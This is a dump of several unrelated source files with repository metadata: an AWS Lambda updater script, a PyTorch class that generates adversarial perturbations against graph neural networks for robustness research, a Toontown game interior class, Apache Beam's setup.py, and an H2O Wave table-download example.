] | 1 | 2019-05-11T14:19:37.000Z | 2019-05-11T14:51:04.000Z | pbx_gs_python_utils/Update_Lambda_Functions.py | owasp-sbot/pbx-gs-python-utils | f448aa36c4448fc04d30c3a5b25640ea4d44a267 | [
"Apache-2.0"
] | 4 | 2018-12-27T04:54:14.000Z | 2019-05-11T14:07:47.000Z | # import sys
# sys.path.append('..')
#
# import json
#
# from pbx_gs_python_utils.utils.Dev import Dev
# from pbx_gs_python_utils.utils.Lambdas_Helpers import slack_message
# from osbot_aws.apis.Lambda import Lambda
#
#
# class Update_Lambda_Functions:
#
# def update_lambda_function(self, name):
# try:
# Lambda(name).update_with_lib()
# return { 'status':'ok' , 'name': name}
# except Exception as error:
# return { 'status':'error' , 'name': name, 'details': '{0}'.format(error)}
#
# def update_lambda_functions(self):
# print('\n in update_lambda_functions ... \n')
#
# targets = [
# 'pbx_gs_python_utils.lambdas.gsbot.lambda_gs_bot', # lambda_gs_bot API_GS_Bot GS_Bot_Commands
# 'pbx_gs_python_utils.lambdas.gsbot.gsbot_gs_jira', # gsbot_gs_jira GS_Bot_ Jira_Commands
# 'pbx_gs_python_utils.lambdas.gsbot.gsbot_slack' , # gsbot_slack Slack_Commands_Helper
#
# 'pbx_gs_python_utils.lambdas.gs.elastic_jira' , # elastic_jira GS_Bot_Jira
#
# 'pbx_gs_python_utils.lambdas.utils.log_to_elk' , # log_to_elk Log_To_Elk
# 'pbx_gs_python_utils.lambdas.utils.slack_message', # slack_message API_Slack
#
# ]
# result = []
# for target in targets:
# result.append(self.update_lambda_function(target))
#
# text = ":building_construction: *updated lambda functions* for `pbx_gs_python_utils`:"
# attachments = [{'text': json.dumps(result, indent=4), 'color': 'good'}]
# slack_message(text, attachments,'DDKUZTK6X','T7F3AUXGV') # gs-bot-tests
# Dev.pprint(result)
#
# return result
#
# # def healthcheck_gs_elastic_jira(self):
# # target = Lambda('gs.elastic_jira')
# # Dev.pprint(target.info())
#
#
# if __name__ == '__main__':
# Update_Lambda_Functions().update_lambda_functions() | 41.098039 | 137 | 0.594943 |
77145b78603a87cea8541430a2ff9fb64cd6654c | 10,843 | py | Python | gnn_pygan/gan_attack/attacker/attacker_sup.py | Guo-lab/Graph | c4c5fbc8fb5d645c16da20351b9746019cf75aab | [
"MIT"
] | null | null | null | gnn_pygan/gan_attack/attacker/attacker_sup.py | Guo-lab/Graph | c4c5fbc8fb5d645c16da20351b9746019cf75aab | [
"MIT"
] | null | null | null | gnn_pygan/gan_attack/attacker/attacker_sup.py | Guo-lab/Graph | c4c5fbc8fb5d645c16da20351b9746019cf75aab | [
"MIT"
] | null | null | null | import torch as ch
import torch.nn as nn
from tqdm import tqdm
from utils import helpers
from . import attack_steps
from estimator.estimator import mi_loss, mi_loss_neg
import time, gc
class Attacker(ch.nn.Module):
"""
Attacker class, used to make adversarial examples.
This is primarily an internal class, you probably want to be looking at
:class:`robustness.attacker.AttackerModel`, which is how models are actually
served (AttackerModel uses this Attacker class).
However, the :meth:`robustness.Attacker.forward` function below
documents the arguments supported for adversarial attacks specifically.
"""
def __init__(self, model, features, nb_nodes, idx_train, train_lbls, batch_size=1, sparse=True,
dataset=None, attack_mode='A', show_attack=True, gpu=True):
"""
Initialize the Attacker
Args:
nn.Module model : the PyTorch model to attack
Dataset dataset : dataset the model is trained on, only used to get mean and std for normalization
"""
super(Attacker, self).__init__()
# self.normalize = helpers.InputNormalize(dataset.mean, dataset.std)
self.model = model
# self.sp_adj = sp_adj
# self.sp_A = sp_A
# self.sp_adj_ori = sp_adj_ori
self.features = features
self.nb_nodes = nb_nodes
self.batch_size = batch_size
self.sparse = sparse
self.dataset = dataset
self.attack_mode = attack_mode
self.show_attack = show_attack
self.gpu = gpu
self.idx_train = idx_train
self.train_lbls = train_lbls
self.I = ch.eye(self.nb_nodes)
if self.gpu:
self.I = self.I.cuda()
def forward(self, encoder, log_sup, adj_sys, A, target, eps, step_size, iterations, xent, b_xent,
eps_x=0.1, step_size_x=1e-5,
random_start=False, random_restarts=False, do_tqdm=False,
targeted=False, custom_loss=None, should_normalize=True,
orig_input=None, use_best=True, return_image=True, est_grad=None,
make_adv=True, return_a=False):
if self.dataset == 'pubmed':
A = A.to_dense()
# Can provide a different input to make the feasible set around
# instead of the initial point
if orig_input is None: orig_input = adj_sys.detach()
# orig_input = orig_input.cuda()
# Multiplier for gradient ascent [untargeted] or descent [targeted]
m = -1 if targeted else 1
# Main function for making adversarial examples
def get_adv_examples(adj, A, return_a=False):
# Initialize step class and attacker criterion
step_class = attack_steps.L0Step
step = step_class(orig_input=orig_input, A=A, eps=eps, step_size=step_size, nb_nodes=self.nb_nodes)
iterator = range(iterations)
if do_tqdm: iterator = tqdm(iterator)
# Keep track of the "best" (worst-case) loss and its
# corresponding input
best_loss = None
best_delta_A = None
# A function that updates the best loss and best input
def replace_best(loss, bloss, x, bx):
if bloss is None:
bx = x.clone().detach()
bloss = loss.clone().detach()
else:
replace = m * bloss < m * loss
bx[replace] = x[replace].clone().detach()
bloss[replace] = loss[replace]
return bloss, bx
# PGD iterate
C = 1 - 2 * A - self.I
delta_A = ch.autograd.Variable(ch.zeros(adj.shape, dtype=ch.float32), requires_grad=True)
if self.gpu:
delta_A = delta_A.cuda()
for _ in iterator:
delta_A = delta_A.requires_grad_(True)
adj = self.preprocess(A + delta_A * C)
embeds, _ = encoder.embed(self.features, adj, True, None, grad=True)
train_embs = embeds[0, self.idx_train]
logits = log_sup(train_embs)
loss = xent(logits, self.train_lbls)
# loss = mi_loss(self.model, adj, self.features, self.nb_nodes, b_xent, self.batch_size, self.sparse)
if self.show_attack:
print(" Attack Loss: {}".format(loss.detach().cpu().numpy()))
if step.use_grad:
if est_grad is None:
grad, = ch.autograd.grad(m * loss, [delta_A], retain_graph=True)
else:
f = lambda _x: m * mi_loss(self.model, _x, self.features, self.nb_nodes, b_xent, self.batch_size, self.sparse)
grad = helpers.calc_est_grad(f, adj, target, *est_grad)
else:
grad = None
with ch.no_grad():
args = [loss, best_loss, delta_A, best_delta_A]
best_loss, best_delta_A = replace_best(*args) if use_best else (loss, delta_A)
delta_A = step.step(delta_A, grad)
delta_A = step.project(delta_A)
if self.gpu:
delta_A = delta_A.cuda()
if do_tqdm: iterator.set_description("Current loss: {l}".format(l=loss))
grad.cpu()
del grad
gc.collect()
ch.cuda.empty_cache()
# Save computation (don't compute last loss) if not use_best
if not use_best:
ret = adj.clone().detach()
return step.to_image(ret) if return_image else ret
embeds, _ = encoder.embed(self.features, self.preprocess(step.to_image(delta_A)+A), True, None)
train_embs = embeds[0, self.idx_train]
logits = log_sup(train_embs)
loss = xent(logits, self.train_lbls)
# loss = mi_loss(self.model, self.preprocess(step.to_image(delta_A)+A), self.features,
# self.nb_nodes, b_xent, self.batch_size, self.sparse)
args = [loss, best_loss, delta_A, best_delta_A]
best_loss, best_delta_A = replace_best(*args)
if return_a:
return step.to_image(best_delta_A, show=True)+A if return_image else best_delta_A
else:
return self.preprocess(step.to_image(best_delta_A, show=True)+A) if return_image else best_delta_A
# return self.preprocess(step.to_image(best_A, A_ori)) if return_image else best_A
# Main function for making adversarial examples
def get_adv_x_examples(x):
# Initialize step class and attacker criterion
stepx_class = attack_steps.LinfStep
stepx = stepx_class(orig_input=orig_input, A=A, eps=eps, eps_x=eps_x, step_size=step_size,
step_size_x=step_size_x, nb_nodes=self.nb_nodes)
iterator = range(iterations)
if do_tqdm: iterator = tqdm(iterator)
# Keep track of the "best" (worst-case) loss and its
# corresponding input
best_loss = None
best_x = None
# A function that updates the best loss and best input
def replace_best(loss, bloss, x, bx):
if bloss is None:
bx = x.clone().detach()
bloss = loss.clone().detach()
else:
replace = m * bloss < m * loss
bx[replace] = x[replace].clone().detach()
bloss[replace] = loss[replace]
return bloss, bx
# PGD iterate
for _ in iterator:
x = x.clone().detach().requires_grad_(True)
embeds, _ = encoder.embed(x, adj_sys, True, None, grad=True)
train_embs = embeds[0, self.idx_train]
logits = log_sup(train_embs)
loss = xent(logits, self.train_lbls)
# loss = mi_loss(self.model, adj_sys, x, self.nb_nodes, b_xent, self.batch_size, self.sparse)
# loss = mi_loss_neg(self.model, x, self.sp_adj_ori, self.features, self.nb_nodes, b_xent, self.batch_size, self.sparse)
if self.show_attack:
print(" Attack Loss: {}".format(loss.detach().cpu().numpy()))
if stepx.use_grad:
if est_grad is None:
# ch.cuda.empty_cache()
grad, = ch.autograd.grad(m * loss, [x], retain_graph=True)
else:
f = lambda _x: m * mi_loss(self.model, adj_sys, x, self.nb_nodes, b_xent, self.batch_size, self.sparse)
grad = helpers.calc_est_grad(f, adj_sys, target, *est_grad)
else:
grad = None
with ch.no_grad():
args = [loss, best_loss, x, best_x]
best_loss, best_x = replace_best(*args) if use_best else (loss, x)
x = stepx.step(x, grad)
x = stepx.project(x, self.features)
if do_tqdm: iterator.set_description("Current loss: {l}".format(l=loss))
# Save computation (don't compute last loss) if not use_best
if not use_best:
ret = x.clone().detach()
return ret
# loss = mi_loss(self.model, adj_sys, x, self.nb_nodes, b_xent, self.batch_size, self.sparse)
embeds, _ = encoder.embed(x, adj_sys, True, None, grad=True)
train_embs = embeds[0, self.idx_train]
logits = log_sup(train_embs)
loss = xent(logits, self.train_lbls)
args = [loss, best_loss, x, best_x]
best_loss, best_x = replace_best(*args)
return best_x
# Random restarts: repeat the attack and find the worst-case
# example for each input in the batch
if self.attack_mode == 'A':
adv_ret = get_adv_examples(adj_sys, A, return_a)
return adv_ret
if self.attack_mode == 'X':
adv_X_ret = get_adv_x_examples(self.features)
return adv_X_ret
elif self.attack_mode == 'both':
adv_ret = get_adv_examples(adj_sys, A, return_a)
adv_X_ret = get_adv_x_examples(self.features)
return adv_ret, adv_X_ret
def preprocess(self, adj):
adj = adj + self.I
D = ch.diag(1 / ch.sqrt(ch.sum(adj, 0)))
adj_sys = ch.matmul(ch.matmul(D, adj), D)
# adj_sys = ch.matmul(ch.matmul(ch.diag(1 / ch.sqrt(ch.sum(adj + self.I, 0))), adj + self.I), ch.diag(1 / ch.sqrt(ch.sum(adj + self.I, 0))))
return adj_sys | 43.721774 | 148 | 0.564143 |
b900d491f7619c1134430f85f667338aa9f5f9c5 | 7,796 | py | Python | v1.0.0.test/toontown/building/DistributedToonInterior.py | TTOFFLINE-LEAK/ttoffline | bb0e91704a755d34983e94288d50288e46b68380 | [
"MIT"
] | 4 | 2019-07-01T15:46:43.000Z | 2021-07-23T16:26:48.000Z | v1.0.0.test/toontown/building/DistributedToonInterior.py | TTOFFLINE-LEAK/ttoffline | bb0e91704a755d34983e94288d50288e46b68380 | [
"MIT"
] | 1 | 2019-06-29T03:40:05.000Z | 2021-06-13T01:15:16.000Z | v1.0.0.test/toontown/building/DistributedToonInterior.py | TTOFFLINE-LEAK/ttoffline | bb0e91704a755d34983e94288d50288e46b68380 | [
"MIT"
] | 4 | 2019-07-28T21:18:46.000Z | 2021-02-25T06:37:25.000Z | from toontown.toonbase.ToonBaseGlobal import *
from panda3d.core import *
from panda3d.toontown import *
from direct.interval.IntervalGlobal import *
from direct.distributed.ClockDelta import *
from toontown.toonbase import ToontownGlobals
import ToonInterior
from direct.directnotify import DirectNotifyGlobal
from direct.fsm import ClassicFSM, State
from direct.distributed import DistributedObject
from direct.fsm import State
import random, ToonInteriorColors
from toontown.hood import ZoneUtil
from toontown.toon import ToonDNA
from toontown.toon import ToonHead
SIGN_LEFT = -4
SIGN_RIGHT = 4
SIGN_BOTTOM = -3.5
SIGN_TOP = 1.5
FrameScale = 1.4
class DistributedToonInterior(DistributedObject.DistributedObject):
def __init__(self, cr):
DistributedObject.DistributedObject.__init__(self, cr)
self.fsm = ClassicFSM.ClassicFSM('DistributedToonInterior', [State.State('toon', self.enterToon, self.exitToon, ['beingTakenOver']), State.State('beingTakenOver', self.enterBeingTakenOver, self.exitBeingTakenOver, []), State.State('off', self.enterOff, self.exitOff, [])], 'toon', 'off')
self.fsm.enterInitialState()
def generate(self):
DistributedObject.DistributedObject.generate(self)
def announceGenerate(self):
DistributedObject.DistributedObject.announceGenerate(self)
self.setup()
def disable(self):
self.interior.removeNode()
del self.interior
DistributedObject.DistributedObject.disable(self)
def delete(self):
del self.fsm
DistributedObject.DistributedObject.delete(self)
def randomDNAItem(self, category, findFunc):
codeCount = self.dnaStore.getNumCatalogCodes(category)
index = self.randomGenerator.randint(0, codeCount - 1)
code = self.dnaStore.getCatalogCode(category, index)
return findFunc(code)
def replaceRandomInModel(self, model):
baseTag = 'random_'
npc = model.findAllMatches('**/' + baseTag + '???_*')
for i in xrange(npc.getNumPaths()):
np = npc.getPath(i)
name = np.getName()
b = len(baseTag)
category = name[b + 4:]
key1 = name[b]
key2 = name[(b + 1)]
if key1 == 'm':
model = self.randomDNAItem(category, self.dnaStore.findNode)
newNP = model.copyTo(np)
c = render.findAllMatches('**/collision')
c.stash()
if key2 == 'r':
self.replaceRandomInModel(newNP)
elif key1 == 't':
texture = self.randomDNAItem(category, self.dnaStore.findTexture)
np.setTexture(texture, 100)
newNP = np
if key2 == 'c':
if category == 'TI_wallpaper' or category == 'TI_wallpaper_border':
self.randomGenerator.seed(self.zoneId)
newNP.setColorScale(self.randomGenerator.choice(self.colors[category]))
else:
newNP.setColorScale(self.randomGenerator.choice(self.colors[category]))
def setup(self):
self.dnaStore = base.cr.playGame.dnaStore
self.randomGenerator = random.Random()
self.randomGenerator.seed(self.zoneId)
interior = self.randomDNAItem('TI_room', self.dnaStore.findNode)
self.interior = interior.copyTo(render)
hoodId = ZoneUtil.getCanonicalHoodId(self.zoneId)
self.colors = ToonInteriorColors.colors[hoodId]
self.replaceRandomInModel(self.interior)
doorModelName = 'door_double_round_ul'
if doorModelName[-1:] == 'r':
doorModelName = doorModelName[:-1] + 'l'
else:
doorModelName = doorModelName[:-1] + 'r'
door = self.dnaStore.findNode(doorModelName)
door_origin = render.find('**/door_origin;+s')
doorNP = door.copyTo(door_origin)
door_origin.setScale(0.8, 0.8, 0.8)
door_origin.setPos(door_origin, 0, -0.025, 0)
color = self.randomGenerator.choice(self.colors['TI_door'])
DNADoor.setupDoor(doorNP, self.interior, door_origin, self.dnaStore, str(self.block), color)
doorFrame = doorNP.find('door_*_flat')
doorFrame.wrtReparentTo(self.interior)
doorFrame.setColor(color)
sign = hidden.find('**/tb%s:*_landmark_*_DNARoot/**/sign;+s' % (self.block,))
if not sign.isEmpty():
signOrigin = self.interior.find('**/sign_origin;+s')
newSignNP = sign.copyTo(signOrigin)
mat = self.dnaStore.getSignTransformFromBlockNumber(int(self.block))
inv = Mat4(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
inv.invertFrom(mat)
newSignNP.setMat(inv)
newSignNP.flattenLight()
ll = Point3()
ur = Point3()
newSignNP.calcTightBounds(ll, ur)
width = ur[0] - ll[0]
height = ur[2] - ll[2]
if width != 0 and height != 0:
xScale = (SIGN_RIGHT - SIGN_LEFT) / width
zScale = (SIGN_TOP - SIGN_BOTTOM) / height
scale = min(xScale, zScale)
xCenter = (ur[0] + ll[0]) / 2.0
zCenter = (ur[2] + ll[2]) / 2.0
newSignNP.setPosHprScale((SIGN_RIGHT + SIGN_LEFT) / 2.0 - xCenter * scale, -0.1, (SIGN_TOP + SIGN_BOTTOM) / 2.0 - zCenter * scale, 0.0, 0.0, 0.0, scale, scale, scale)
trophyOrigin = self.interior.find('**/trophy_origin')
trophy = self.buildTrophy()
if trophy:
trophy.reparentTo(trophyOrigin)
del self.colors
del self.dnaStore
del self.randomGenerator
self.interior.flattenMedium()
def setZoneIdAndBlock(self, zoneId, block):
self.zoneId = zoneId
self.block = block
def setToonData(self, savedBy):
self.savedBy = savedBy
def buildTrophy(self):
if self.savedBy == None:
return
else:
numToons = len(self.savedBy)
pos = 1.25 - 1.25 * numToons
trophy = hidden.attachNewNode('trophy')
for avId, name, dnaNetString, isGM in self.savedBy:
frame = self.buildFrame(name, dnaNetString)
frame.reparentTo(trophy)
frame.setPos(pos, 0, 0)
pos += 2.5
return trophy
def buildFrame(self, name, dnaNetString):
frame = loader.loadModel('phase_3.5/models/modules/trophy_frame')
dna = ToonDNA.ToonDNA(dnaNetString)
head = ToonHead.ToonHead()
head.setupHead(dna)
head.setPosHprScale(0, -0.05, -0.05, 180, 0, 0, 0.55, 0.02, 0.55)
if dna.head[0] == 'r':
head.setZ(-0.15)
elif dna.head[0] == 'h':
head.setZ(0.05)
elif dna.head[0] == 'm':
head.setScale(0.45, 0.02, 0.45)
head.reparentTo(frame)
nameText = TextNode('trophy')
nameText.setFont(ToontownGlobals.getToonFont())
nameText.setAlign(TextNode.ACenter)
nameText.setTextColor(0, 0, 0, 1)
nameText.setWordwrap(5.36 * FrameScale)
nameText.setText(name)
namePath = frame.attachNewNode(nameText.generate())
namePath.setPos(0, -0.03, -0.6)
namePath.setScale(0.186 / FrameScale)
frame.setScale(FrameScale, 1.0, FrameScale)
return frame
def setState(self, state, timestamp):
self.fsm.request(state, [globalClockDelta.localElapsedTime(timestamp)])
def enterOff(self):
pass
def exitOff(self):
pass
def enterToon(self):
pass
def exitToon(self):
pass
def enterBeingTakenOver(self, ts):
messenger.send('clearOutToonInterior')
def exitBeingTakenOver(self):
pass | 39.175879 | 295 | 0.611852 |
245b08cf6141a4b19eeffc90c2f731d3af3471db | 11,063 | py | Python | sdks/python/setup.py | chermenin/beam | 53d5ebf812f57fc48827475552109399274d772e | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | sdks/python/setup.py | chermenin/beam | 53d5ebf812f57fc48827475552109399274d772e | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | sdks/python/setup.py | chermenin/beam | 53d5ebf812f57fc48827475552109399274d772e | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Apache Beam SDK for Python setup file."""
import os
import sys
import warnings
from distutils.errors import DistutilsError
from distutils.version import StrictVersion
# Pylint and isort disagree here.
# pylint: disable=ungrouped-imports
import setuptools
from pkg_resources import DistributionNotFound
from pkg_resources import get_distribution
from pkg_resources import normalize_path
from pkg_resources import to_filename
from setuptools import Command
from setuptools.command.build_py import build_py
from setuptools.command.develop import develop
from setuptools.command.egg_info import egg_info
from setuptools.command.test import test
class mypy(Command):
user_options = []
def initialize_options(self):
"""Abstract method that is required to be overwritten"""
def finalize_options(self):
"""Abstract method that is required to be overwritten"""
def get_project_path(self):
self.run_command('egg_info')
# Build extensions in-place
self.reinitialize_command('build_ext', inplace=1)
self.run_command('build_ext')
ei_cmd = self.get_finalized_command("egg_info")
project_path = normalize_path(ei_cmd.egg_base)
return os.path.join(project_path, to_filename(ei_cmd.egg_name))
def run(self):
import subprocess
args = ['mypy', self.get_project_path()]
result = subprocess.call(args)
if result != 0:
raise DistutilsError("mypy exited with status %d" % result)
def get_version():
global_names = {}
exec( # pylint: disable=exec-used
open(os.path.join(
os.path.dirname(os.path.abspath(__file__)),
'apache_beam/version.py')
).read(),
global_names
)
return global_names['__version__']
PACKAGE_NAME = 'apache-beam'
PACKAGE_VERSION = get_version()
PACKAGE_DESCRIPTION = 'Apache Beam SDK for Python'
PACKAGE_URL = 'https://beam.apache.org'
PACKAGE_DOWNLOAD_URL = 'https://pypi.python.org/pypi/apache-beam'
PACKAGE_AUTHOR = 'Apache Software Foundation'
PACKAGE_EMAIL = 'dev@beam.apache.org'
PACKAGE_KEYWORDS = 'apache beam'
PACKAGE_LONG_DESCRIPTION = '''
Apache Beam is a unified programming model for both batch and streaming
data processing, enabling efficient execution across diverse distributed
execution engines and providing extensibility points for connecting to
different technologies and user communities.
'''
REQUIRED_PIP_VERSION = '7.0.0'
_PIP_VERSION = get_distribution('pip').version
if StrictVersion(_PIP_VERSION) < StrictVersion(REQUIRED_PIP_VERSION):
warnings.warn(
"You are using version {0} of pip. " \
"However, version {1} is recommended.".format(
_PIP_VERSION, REQUIRED_PIP_VERSION
)
)
REQUIRED_CYTHON_VERSION = '0.28.1'
try:
_CYTHON_VERSION = get_distribution('cython').version
if StrictVersion(_CYTHON_VERSION) < StrictVersion(REQUIRED_CYTHON_VERSION):
warnings.warn(
"You are using version {0} of cython. " \
"However, version {1} is recommended.".format(
_CYTHON_VERSION, REQUIRED_CYTHON_VERSION
)
)
except DistributionNotFound:
# do nothing if Cython is not installed
pass
try:
# pylint: disable=wrong-import-position
from Cython.Build import cythonize
except ImportError:
cythonize = lambda *args, **kwargs: []
REQUIRED_PACKAGES = [
# Avro 1.9.2 for python3 was broken. The issue was fixed in version 1.9.2.1
'avro-python3>=1.8.1,!=1.9.2,<1.10.0',
'crcmod>=1.7,<2.0',
# dataclasses backport for python_version<3.7. No version bound because this
# is Python standard since Python 3.7 and each Python version is compatible
# with a specific dataclasses version.
'dataclasses;python_version<"3.7"',
# orjson, only available on Python 3.6 and above
'orjson<4.0;python_version>="3.6"',
# Dill doesn't have forwards-compatibility guarantees within minor version.
# Pickles created with a new version of dill may not unpickle using older
# version of dill. It is best to use the same version of dill on client and
# server, therefore list of allowed versions is very narrow.
# See: https://github.com/uqfoundation/dill/issues/341.
'dill>=0.3.1.1,<0.3.2',
'fastavro>=0.21.4,<2',
'future>=0.18.2,<1.0.0',
'grpcio>=1.29.0,<2',
'hdfs>=2.1.0,<3.0.0',
'httplib2>=0.8,<0.20.0',
'numpy>=1.14.3,<1.21.0',
'pymongo>=3.8.0,<4.0.0',
'oauth2client>=2.0.1,<5',
'protobuf>=3.12.2,<4',
'pyarrow>=0.15.1,<5.0.0',
'pydot>=1.2.0,<2',
'python-dateutil>=2.8.0,<3',
'pytz>=2018.3',
'requests>=2.24.0,<3.0.0',
'typing-extensions>=3.7.0,<4',
]
# [BEAM-8181] pyarrow cannot be installed on 32-bit Windows platforms.
if sys.platform == 'win32' and sys.maxsize <= 2**32:
REQUIRED_PACKAGES = [
p for p in REQUIRED_PACKAGES if not p.startswith('pyarrow')
]
REQUIRED_TEST_PACKAGES = [
'freezegun>=0.3.12',
'mock>=1.0.1,<3.0.0',
'pandas>=1.0,<1.3.0',
'parameterized>=0.7.1,<0.8.0',
'pyhamcrest>=1.9,!=1.10.0,<2.0.0',
'pyyaml>=3.12,<6.0.0',
'requests_mock>=1.7,<2.0',
'tenacity>=5.0.2,<6.0',
'pytest>=4.4.0,<5.0',
'pytest-xdist>=1.29.0,<2',
'pytest-timeout>=1.3.3,<2',
'sqlalchemy>=1.3,<2.0',
'psycopg2-binary>=2.8.5,<3.0.0',
'testcontainers>=3.0.3,<4.0.0',
]
GCP_REQUIREMENTS = [
'cachetools>=3.1.0,<5',
'google-apitools>=0.5.31,<0.5.32',
# NOTE: Maintainers, please do not require google-auth>=2.x.x
# Until this issue is closed
# https://github.com/googleapis/google-cloud-python/issues/10566
'google-auth>=1.18.0,<3',
'google-cloud-datastore>=1.8.0,<2',
'google-cloud-pubsub>=0.39.0,<2',
# GCP packages required by tests
'google-cloud-bigquery>=1.6.0,<3',
'google-cloud-core>=0.28.1,<2',
'google-cloud-bigtable>=0.31.1,<2',
'google-cloud-spanner>=1.13.0,<2',
'grpcio-gcp>=0.2.2,<1',
# GCP Packages required by ML functionality
'google-cloud-dlp>=0.12.0,<2',
'google-cloud-language>=1.3.0,<2',
'google-cloud-videointelligence>=1.8.0,<2',
'google-cloud-vision>=0.38.0,<2',
'google-cloud-recommendations-ai>=0.1.0,<=0.2.0'
]
INTERACTIVE_BEAM = [
'facets-overview>=1.0.0,<2',
'ipython>=7,<8',
'ipykernel>=5.2.0,<6',
# Skip version 6.1.13 due to
# https://github.com/jupyter/jupyter_client/issues/637
'jupyter-client>=6.1.11,<6.1.13',
'timeloop>=1.0.2,<2',
]
INTERACTIVE_BEAM_TEST = [
# notebok utils
'nbformat>=5.0.5,<6',
'nbconvert>=6.2.0,<7',
# headless chrome based integration tests
'selenium>=3.141.0,<4',
'needle>=0.5.0,<1',
'chromedriver-binary>=93,<94',
# use a fixed major version of PIL for different python versions
'pillow>=7.1.1,<8',
]
AWS_REQUIREMENTS = ['boto3 >=1.9']
AZURE_REQUIREMENTS = [
'azure-storage-blob >=12.3.2',
'azure-core >=1.7.0',
]
# We must generate protos after setup_requires are installed.
def generate_protos_first(original_cmd):
try:
# See https://issues.apache.org/jira/browse/BEAM-2366
# pylint: disable=wrong-import-position
import gen_protos
class cmd(original_cmd, object):
def run(self):
gen_protos.generate_proto_files()
super(cmd, self).run()
return cmd
except ImportError:
warnings.warn("Could not import gen_protos, skipping proto generation.")
return original_cmd
python_requires = '>=3.6'
if sys.version_info.major == 3 and sys.version_info.minor >= 9:
warnings.warn(
'This version of Apache Beam has not been sufficiently tested on '
'Python %s.%s. You may encounter bugs or missing features.' %
(sys.version_info.major, sys.version_info.minor))
setuptools.setup(
name=PACKAGE_NAME,
version=PACKAGE_VERSION,
description=PACKAGE_DESCRIPTION,
long_description=PACKAGE_LONG_DESCRIPTION,
url=PACKAGE_URL,
download_url=PACKAGE_DOWNLOAD_URL,
author=PACKAGE_AUTHOR,
author_email=PACKAGE_EMAIL,
packages=setuptools.find_packages(),
package_data={
'apache_beam': [
'*/*.pyx',
'*/*/*.pyx',
'*/*.pxd',
'*/*/*.pxd',
'*/*.h',
'*/*/*.h',
'testing/data/*.yaml',
'portability/api/*.yaml'
]
},
ext_modules=cythonize([
# Make sure to use language_level=3 cython directive in files below.
'apache_beam/**/*.pyx',
'apache_beam/coders/coder_impl.py',
'apache_beam/metrics/cells.py',
'apache_beam/metrics/execution.py',
'apache_beam/runners/common.py',
'apache_beam/runners/worker/logger.py',
'apache_beam/runners/worker/opcounters.py',
'apache_beam/runners/worker/operations.py',
'apache_beam/transforms/cy_combiners.py',
'apache_beam/transforms/stats.py',
'apache_beam/utils/counters.py',
'apache_beam/utils/windowed_value.py',
]),
install_requires=REQUIRED_PACKAGES,
python_requires=python_requires,
# BEAM-8840: Do NOT use tests_require or setup_requires.
extras_require={
'docs': ['Sphinx>=1.5.2,<2.0'],
'test': REQUIRED_TEST_PACKAGES,
'gcp': GCP_REQUIREMENTS,
'interactive': INTERACTIVE_BEAM,
'interactive_test': INTERACTIVE_BEAM_TEST,
'aws': AWS_REQUIREMENTS,
'azure': AZURE_REQUIREMENTS
},
zip_safe=False,
# PyPI package information.
classifiers=[
'Intended Audience :: End Users/Desktop',
'License :: OSI Approved :: Apache Software License',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
# When updating vesion classifiers, also update version warnings
# above and in apache_beam/__init__.py.
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules',
],
license='Apache License, Version 2.0',
keywords=PACKAGE_KEYWORDS,
cmdclass={
'build_py': generate_protos_first(build_py),
'develop': generate_protos_first(develop),
'egg_info': generate_protos_first(egg_info),
'test': generate_protos_first(test),
'mypy': generate_protos_first(mypy),
},
)
| 33.122754 | 80 | 0.670975 |
81abd9447837a736af19063458b954ed2b49e934 | 1,795 | py | Python | py/examples/table_download.py | angelosaleh/wave | 06f5601e13c23e021429dbdb9f6140ddfed27644 | [
"Apache-2.0"
] | 1 | 2021-01-02T04:47:28.000Z | 2021-01-02T04:47:28.000Z | py/examples/table_download.py | MaxCodeXTC/wave | b16bcd99b9752aae93aacf84d5c160093d775131 | [
"Apache-2.0"
] | null | null | null | py/examples/table_download.py | MaxCodeXTC/wave | b16bcd99b9752aae93aacf84d5c160093d775131 | [
"Apache-2.0"
] | 1 | 2021-02-01T05:07:56.000Z | 2021-02-01T05:07:56.000Z | # Table / Download
# Allow downloading a table's data as CSV file.
# #table #download
# ---
import random
from faker import Faker
from h2o_wave import main, app, Q, ui
fake = Faker()
_id = 0
class Issue:
def __init__(self, text: str, status: str, progress: float, icon: str, notifications: str):
global _id
_id += 1
self.id = f'I{_id}'
self.text = text
self.status = status
self.views = 0
self.progress = progress
self.icon = icon
self.notifications = notifications
# Create some issues
issues = [
Issue(
text=fake.sentence(),
status=('Closed' if i % 2 == 0 else 'Open'),
progress=random.random(),
icon=('BoxCheckmarkSolid' if random.random() > 0.5 else 'BoxMultiplySolid'),
notifications=('Off' if random.random() > 0.5 else 'On')) for i in range(100)
]
# Create columns for our issue table.
columns = [
ui.table_column(name='text', label='Issue'),
ui.table_column(name='status', label='Status'),
ui.table_column(name='notifications', label='Notifications'),
ui.table_column(name='done', label='Done', cell_type=ui.icon_table_cell_type()),
ui.table_column(name='views', label='Views'),
ui.table_column(name='progress', label='Progress', cell_type=ui.progress_table_cell_type()),
]
@app('/demo')
async def serve(q: Q):
q.page['form'] = ui.form_card(box='1 1 -1 11', items=[
ui.table(
name='issues',
columns=columns,
rows=[ui.table_row(
name=issue.id,
cells=[issue.text, issue.status, issue.notifications, issue.icon, str(issue.views), issue.progress]) for
issue in issues],
downloadable=True,
)
])
await q.page.save()
| 28.951613 | 120 | 0.607242 |
375068ef537e3074e807ef6eab51eaadddba56dc | 6,710 | py | Python | caffe2/python/sparse_to_dense_mask_test.py | wenhaopeter/read_pytorch_code | 491f989cd918cf08874dd4f671fb7f0142a0bc4f | [
"Intel",
"X11"
